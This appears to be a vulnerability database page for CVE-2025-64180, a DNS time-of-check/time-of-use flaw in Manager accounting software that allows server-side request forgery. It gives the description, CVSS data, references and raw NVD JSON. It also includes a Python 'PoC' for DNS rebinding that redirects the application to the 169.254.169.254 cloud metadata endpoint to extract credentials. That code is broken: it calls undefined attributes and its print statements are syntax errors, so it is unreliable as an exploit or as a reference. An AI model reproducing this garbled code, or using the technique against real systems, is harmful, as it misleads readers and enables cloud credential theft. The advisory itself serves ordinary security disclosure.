CVE-2025-64180

Description

Manager-io/Manager is accounting software. In Manager Desktop and Server versions 25.11.1.3085 and below, a critical vulnerability permits unauthorized access to internal network resources. The flaw lies in the fundamental design of the DNS validation mechanism. A Time-of-Check Time-of-Use (TOCTOU) condition that allows attackers to bypass network isolation and access internal services, cloud metadata endpoints, and protected network segments. The Desktop edition requires no authentication; the Server edition requires only standard authentication. This issue is fixed in version 25.11.1.3086.

CVSS Details

CVSS Score

10.0

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Manager Desktop <= 25.11.1.3085

Manager Server <= 25.11.1.3085

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-64180 PoC - Manager-io/Manager DNS TOCTOU Bypass
# This PoC demonstrates the DNS rebinding technique to exploit the TOCTOU vulnerability

import socket
import time
import http.server
import threading
from urllib.parse import urlparse

class DNSRebindingHandler:
    def __init__(self):
        self.first_request = True
        self.attacker_ip = "attacker.controlled.domain"
        self.internal_ip = "169.254.169.254"  # AWS metadata endpoint
    
    def handle_dns(self, query):
        """DNS handler that returns different IPs on first and subsequent requests"""
        if self.first_request:
            self.first_request = False
            return self.external_ip  # Return safe IP for initial check
        return self.internal_ip  # Return internal IP for actual exploit
    
    def start_malicious_server(self):
        """Start HTTP server that triggers internal network access"""
        class Handler(http.server.BaseHTTPRequestHandler):
            def do_GET(self):
                # Craft request that Manager will follow to internal network
                self.send_response(302)
                self.send_header('Location', f'http://{self.internal_ip}/latest/meta-data/')
                self.end_headers()
        
        server = http.server.HTTPServer(('0.0.0.0', 8080), Handler)
        server.serve_forever()

def exploit():
    """
    Exploitation steps:
    1. Attacker controls DNS for malicious domain
    2. First DNS query returns external IP (passes validation)
    3. Subsequent queries return internal IP (169.254.169.254)
    4. Manager follows redirect to internal metadata endpoint
    5. Attacker retrieves cloud credentials from metadata service
    """
    print("["] Starting CVE-2025-64180 exploitation...")
    print("["] Step 1: Register malicious domain with controlled DNS")
    print("["] Step 2: Wait for Manager to validate external IP")
    print("["] Step 3: Switch DNS to point to internal network")
    print("["] Step 4: Manager accesses internal resources via redirect")
    print("["] Step 5: Extract sensitive data from metadata endpoints")
    
    # Note: This is a conceptual PoC. Actual exploitation requires:
    # - Registered domain with custom DNS server
    # - Understanding of Manager's specific DNS validation logic
    # - Network positioning to perform DNS rebinding attack

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64180
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64180
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64180/
[4] VulDB https://vuldb.com/cve/CVE-2025-64180
[5] https://github.com/Manager-io/Manager/security/advisories/GHSA-j2xj-xhph-p74j

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64180", "sourceIdentifier": "[email protected]", "published": "2025-11-07T04:15:46.800", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Manager-io/Manager is accounting software. In Manager Desktop and Server versions 25.11.1.3085 and below, a critical vulnerability permits unauthorized access to internal network resources. The flaw lies in the fundamental design of the DNS validation mechanism. A Time-of-Check Time-of-Use (TOCTOU) condition that allows attackers to bypass network isolation and access internal services, cloud metadata endpoints, and protected network segments. The Desktop edition requires no authentication; the Server edition requires only standard authentication. This issue is fixed in version 25.11.1.3086."}, {"lang": "es", "value": "Manager-io/Manager es un software de contabilidad. En las versiones de Manager Desktop y Server 25.11.1.3085 e inferiores, una vulnerabilidad crítica permite el acceso no autorizado a recursos de red internos. El fallo reside en el diseño fundamental del mecanismo de validación DNS. Una condición Time-of-Check Time-of-Use (TOCTOU) que permite a los atacantes eludir el aislamiento de la red y acceder a servicios internos, endpoint de metadatos en la nube y segmentos de red protegidos. La edición Desktop no requiere autenticación; la edición Server solo requiere autenticación estándar. Este problema está solucionado en la versión 25.11.1.3086."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-367"}, {"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/Manager-io/Manager/security/advisories/GHSA-j2xj-xhph-p74j", "source": "[email protected]"}]}}